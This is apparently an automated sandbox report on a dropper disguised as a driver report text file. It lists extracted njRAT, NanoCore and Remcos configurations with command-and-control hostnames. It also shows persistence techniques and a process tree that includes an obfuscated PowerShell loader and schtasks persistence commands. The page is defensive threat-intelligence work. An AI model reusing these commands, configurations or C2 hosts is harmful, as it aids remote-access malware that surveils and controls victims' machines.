nanocore | 0716a1b66277b1ea3576f177f26a7269cb8aeeed9136ea834a4ad0b8537273fa

Analysis

max time kernel
79s
max time network
104s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
07-09-2024 03:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

driverupdate_report_windows_10_22h2.txt.exe
Size

13.8MB
MD5

8360a6245b4ae84a5b6e4784d7802472
SHA1

192f6d4a68ec867c5919a5d5fd4c782bf9c39127
SHA256

393732bdd7df3cbbcc35dca3397178466f32de8ebd266ad5791c000288771bc5
SHA512

38b4630ab40c84f822fe860038c4c48d0ea31ceaa23d05d01f599c08f44a3fe45113f4386f1874799dfb15e7d7930c369c2eeba11129adfa3f9154264cbcc63b
SSDEEP

49152:M3QhanbDdeZ6Hfa/nkNQzlJ7r5oP3TXyymMknH76EAaIilSH7YNjMn80iA+cpUGN:Mn

Score

10^/10

nanocore njrat remcos august crypter toolz grace stub hacked bootkit defense_evasion discovery evasion execution keylogger persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

192.168.1.42:5552

Mutex

bf7b1fe7a7644171a9985ea45221c25c

Attributes

reg_key
bf7b1fe7a7644171a9985ea45221c25c
splitter
|'|'|

Extracted

Family

nanocore

Version

1.2.2.0

hiatus2.ddns.net:1604

127.0.0.1:1604

Mutex

e7e30201-c342-4921-abc6-2182083982ff

Attributes

activate_away_mode
true
backup_connection_host
127.0.0.1
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2024-05-31T20:09:09.303717636Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
1604
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
e7e30201-c342-4921-abc6-2182083982ff
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
hiatus2.ddns.net
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
true
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

remcos

Botnet

AUGUST CRYPTER TOOLZ GRACE STUB

teamfavour222.ddns.net :6767

odogwuvisual123.duckdns.org:6767

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
-YFLE4M
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Sub\\Client.exe"	Client.exe

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
12	2568	powershell.exe

Downloads MZ/PE file
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\International\Geo\Nation	VC_redistx64.exe

Executes dropped EXE 23 IoCs

pid	Process
2380	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
2820	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
2912	BlueScreen.exe
3060	CirnoBackdoorLOL.exe
2792	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
1732	cleansaturn.exe
1832	error.exe
2704	~DeAD5F.tmp
2388	concos_1.6.exe
2648	colorful screen darkener.exe
3000	Client.exe
816	levislocker.exe
2996	malecus.exe
3036	evil.exe
1472	Solaris.exe
2128	TEST.exe
2004	ss.exe
2196	YT_Bot.exe
2556	CirnoBackdoorLOL.exe
1680	javawvd.exe
2720	Youtube-Viewers.exe
2056	ythyperRuntimedhcpSvc.exe
1964	VC_redistx64.exe

Loads dropped DLL 32 IoCs

pid	Process
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2312	driverupdate_report_windows_10_22h2.txt.exe
2704	~DeAD5F.tmp
2704	~DeAD5F.tmp
2704	~DeAD5F.tmp
2704	~DeAD5F.tmp
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000019dbf-20.dat	upx
behavioral1/memory/2912-29-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral1/files/0x000800000001a075-52.dat	upx
behavioral1/memory/2792-55-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/files/0x002d000000019c34-80.dat	upx
behavioral1/memory/1832-82-0x0000000000400000-0x000000000040D000-memory.dmp	upx
behavioral1/memory/2792-208-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/1832-210-0x0000000000400000-0x000000000040D000-memory.dmp	upx
behavioral1/memory/2792-217-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2792-299-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2792-389-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2792-437-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2792-512-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2792-561-0x0000000000400000-0x000000000048A000-memory.dmp	upx
behavioral1/memory/2792-573-0x0000000000400000-0x000000000048A000-memory.dmp	upx

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Explorer = "C:\\Program Files (x86)\\Windows NT\\explorer.exe"	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Explorer = "C:\\Program Files (x86)\\Windows NT\\explorer.exe"	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\My Program = "C:\\ProgramData\\MyHiddenFolder\\VC_redistx64.exe"	VC_redistx64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Sub\\WatchDog.exe"	Client.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\DriverrHub\\Microsoft To Do.exe\""	TEST.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ss.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	malecus.exe
File opened for modification	\??\PhysicalDrive0	concos_1.6.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
2196	YT_Bot.exe
1964	VC_redistx64.exe
1964	VC_redistx64.exe
1964	VC_redistx64.exe
1964	VC_redistx64.exe
1964	VC_redistx64.exe
1964	VC_redistx64.exe
1964	VC_redistx64.exe
1964	VC_redistx64.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Windows NT\explorer.exe	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Windows NT\RCXB480.tmp	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
File created	C:\Program Files (x86)\Windows NT\explorer.exe	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\xdwd.dll	Client.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2432	Powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CirnoBackdoorLOL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	javawvd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VC_redistx64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlueScreen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CirnoBackdoorLOL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javawvd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverupdate_report_windows_10_22h2.txt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	~DeAD5F.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	levislocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ss.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YT_Bot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	error.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	evil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	javawvd.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	CirnoBackdoorLOL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	CirnoBackdoorLOL.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	javawvd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	javawvd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
804	schtasks.exe
2448	schtasks.exe
2636	schtasks.exe
2968	schtasks.exe
2212	schtasks.exe
2760	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2432	Powershell.exe
1680	javawvd.exe
1680	javawvd.exe
1680	javawvd.exe
1680	javawvd.exe
1680	javawvd.exe
1680	javawvd.exe
1680	javawvd.exe
1680	javawvd.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
2568	powershell.exe
1680	javawvd.exe
1680	javawvd.exe
2432	Powershell.exe
2432	Powershell.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
2432	Powershell.exe
2432	Powershell.exe
2128	TEST.exe
2128	TEST.exe
2128	TEST.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
2432	Powershell.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
1680	javawvd.exe
1680	javawvd.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2004	ss.exe
2004	ss.exe
2004	ss.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe
3000	Client.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2004	ss.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1732	cleansaturn.exe
Token: SeDebugPrivilege	3000	Client.exe
Token: SeDebugPrivilege	2432	Powershell.exe
Token: SeDebugPrivilege	2004	ss.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2128	TEST.exe
Token: SeShutdownPrivilege	2996	malecus.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2196	YT_Bot.exe
1964	VC_redistx64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2312 wrote to memory of 2380	2312	driverupdate_report_windows_10_22h2.txt.exe	30
PID 2312 wrote to memory of 2380	2312	driverupdate_report_windows_10_22h2.txt.exe	30
PID 2312 wrote to memory of 2380	2312	driverupdate_report_windows_10_22h2.txt.exe	30
PID 2312 wrote to memory of 2380	2312	driverupdate_report_windows_10_22h2.txt.exe	30
PID 2312 wrote to memory of 2820	2312	driverupdate_report_windows_10_22h2.txt.exe	31
PID 2312 wrote to memory of 2820	2312	driverupdate_report_windows_10_22h2.txt.exe	31
PID 2312 wrote to memory of 2820	2312	driverupdate_report_windows_10_22h2.txt.exe	31
PID 2312 wrote to memory of 2820	2312	driverupdate_report_windows_10_22h2.txt.exe	31
PID 2312 wrote to memory of 2912	2312	driverupdate_report_windows_10_22h2.txt.exe	32
PID 2312 wrote to memory of 2912	2312	driverupdate_report_windows_10_22h2.txt.exe	32
PID 2312 wrote to memory of 2912	2312	driverupdate_report_windows_10_22h2.txt.exe	32
PID 2312 wrote to memory of 2912	2312	driverupdate_report_windows_10_22h2.txt.exe	32
PID 2312 wrote to memory of 3060	2312	driverupdate_report_windows_10_22h2.txt.exe	33
PID 2312 wrote to memory of 3060	2312	driverupdate_report_windows_10_22h2.txt.exe	33
PID 2312 wrote to memory of 3060	2312	driverupdate_report_windows_10_22h2.txt.exe	33
PID 2312 wrote to memory of 3060	2312	driverupdate_report_windows_10_22h2.txt.exe	33
PID 2312 wrote to memory of 2792	2312	driverupdate_report_windows_10_22h2.txt.exe	34
PID 2312 wrote to memory of 2792	2312	driverupdate_report_windows_10_22h2.txt.exe	34
PID 2312 wrote to memory of 2792	2312	driverupdate_report_windows_10_22h2.txt.exe	34
PID 2312 wrote to memory of 2792	2312	driverupdate_report_windows_10_22h2.txt.exe	34
PID 2312 wrote to memory of 1732	2312	driverupdate_report_windows_10_22h2.txt.exe	36
PID 2312 wrote to memory of 1732	2312	driverupdate_report_windows_10_22h2.txt.exe	36
PID 2312 wrote to memory of 1732	2312	driverupdate_report_windows_10_22h2.txt.exe	36
PID 2312 wrote to memory of 1732	2312	driverupdate_report_windows_10_22h2.txt.exe	36
PID 3060 wrote to memory of 2704	3060	CirnoBackdoorLOL.exe	35
PID 3060 wrote to memory of 2704	3060	CirnoBackdoorLOL.exe	35
PID 3060 wrote to memory of 2704	3060	CirnoBackdoorLOL.exe	35
PID 3060 wrote to memory of 2704	3060	CirnoBackdoorLOL.exe	35
PID 2312 wrote to memory of 1832	2312	driverupdate_report_windows_10_22h2.txt.exe	38
PID 2312 wrote to memory of 1832	2312	driverupdate_report_windows_10_22h2.txt.exe	38
PID 2312 wrote to memory of 1832	2312	driverupdate_report_windows_10_22h2.txt.exe	38
PID 2312 wrote to memory of 1832	2312	driverupdate_report_windows_10_22h2.txt.exe	38
PID 2820 wrote to memory of 2432	2820	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	40
PID 2820 wrote to memory of 2432	2820	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	40
PID 2820 wrote to memory of 2432	2820	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	40
PID 2820 wrote to memory of 2432	2820	70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe	40
PID 2312 wrote to memory of 2388	2312	driverupdate_report_windows_10_22h2.txt.exe	39
PID 2312 wrote to memory of 2388	2312	driverupdate_report_windows_10_22h2.txt.exe	39
PID 2312 wrote to memory of 2388	2312	driverupdate_report_windows_10_22h2.txt.exe	39
PID 2312 wrote to memory of 2388	2312	driverupdate_report_windows_10_22h2.txt.exe	39
PID 2312 wrote to memory of 2648	2312	driverupdate_report_windows_10_22h2.txt.exe	41
PID 2312 wrote to memory of 2648	2312	driverupdate_report_windows_10_22h2.txt.exe	41
PID 2312 wrote to memory of 2648	2312	driverupdate_report_windows_10_22h2.txt.exe	41
PID 2312 wrote to memory of 2648	2312	driverupdate_report_windows_10_22h2.txt.exe	41
PID 2312 wrote to memory of 3000	2312	driverupdate_report_windows_10_22h2.txt.exe	43
PID 2312 wrote to memory of 3000	2312	driverupdate_report_windows_10_22h2.txt.exe	43
PID 2312 wrote to memory of 3000	2312	driverupdate_report_windows_10_22h2.txt.exe	43
PID 2312 wrote to memory of 3000	2312	driverupdate_report_windows_10_22h2.txt.exe	43
PID 2312 wrote to memory of 816	2312	driverupdate_report_windows_10_22h2.txt.exe	45
PID 2312 wrote to memory of 816	2312	driverupdate_report_windows_10_22h2.txt.exe	45
PID 2312 wrote to memory of 816	2312	driverupdate_report_windows_10_22h2.txt.exe	45
PID 2312 wrote to memory of 816	2312	driverupdate_report_windows_10_22h2.txt.exe	45
PID 2312 wrote to memory of 2996	2312	driverupdate_report_windows_10_22h2.txt.exe	46
PID 2312 wrote to memory of 2996	2312	driverupdate_report_windows_10_22h2.txt.exe	46
PID 2312 wrote to memory of 2996	2312	driverupdate_report_windows_10_22h2.txt.exe	46
PID 2312 wrote to memory of 2996	2312	driverupdate_report_windows_10_22h2.txt.exe	46
PID 2312 wrote to memory of 3036	2312	driverupdate_report_windows_10_22h2.txt.exe	48
PID 2312 wrote to memory of 3036	2312	driverupdate_report_windows_10_22h2.txt.exe	48
PID 2312 wrote to memory of 3036	2312	driverupdate_report_windows_10_22h2.txt.exe	48
PID 2312 wrote to memory of 3036	2312	driverupdate_report_windows_10_22h2.txt.exe	48
PID 2312 wrote to memory of 1472	2312	driverupdate_report_windows_10_22h2.txt.exe	49
PID 2312 wrote to memory of 1472	2312	driverupdate_report_windows_10_22h2.txt.exe	49
PID 2312 wrote to memory of 1472	2312	driverupdate_report_windows_10_22h2.txt.exe	49
PID 2312 wrote to memory of 1472	2312	driverupdate_report_windows_10_22h2.txt.exe	49

C:\Users\Admin\AppData\Local\Temp\driverupdate_report_windows_10_22h2.txt.exe
"C:\Users\Admin\AppData\Local\Temp\driverupdate_report_windows_10_22h2.txt.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2312
- C:\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2380
- C:\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe
  "C:\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    "Powershell.exe" -windowstyle minimized "$Teratism249 = Get-Content 'C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168' ; $Neglefilen=$Teratism249.SubString(69482,3);.$Neglefilen($Teratism249) "
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2432
- C:\Users\Admin\AppData\Local\Temp\BlueScreen.exe
  "C:\Users\Admin\AppData\Local\Temp\BlueScreen.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2912
- C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe
  "C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Users\Admin\AppData\Local\Temp\~DeAD5F.tmp
    C:\Users\Admin\AppData\Local\Temp\~DeAD5F.tmp _$PID:116 _$EXE:C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe _$CMDLINE:
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2704
  - - C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe
      C:\Users\Admin\AppData\Local\Temp\\CirnoBackdoorLOL.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:2556
  - - C:\Users\Admin\AppData\Local\Temp\javawvd.exe
      C:\Users\Admin\AppData\Local\Temp\javawvd.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:1680
- C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe
  "C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2792
- C:\Users\Admin\AppData\Local\Temp\cleansaturn.exe
  "C:\Users\Admin\AppData\Local\Temp\cleansaturn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1732
- C:\Users\Admin\AppData\Local\Temp\error.exe
  "C:\Users\Admin\AppData\Local\Temp\error.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1832
- C:\Users\Admin\AppData\Local\Temp\concos_1.6.exe
  "C:\Users\Admin\AppData\Local\Temp\concos_1.6.exe"
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  PID:2388
- C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe
  "C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe"
  2⤵
  - Executes dropped EXE
  PID:2648
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- - C:\Windows\system32\CMD.exe
    "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit
    3⤵
    PID:1624
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2968
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:3024
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2212
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:2044
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2760
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:2076
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:804
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:800
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2448
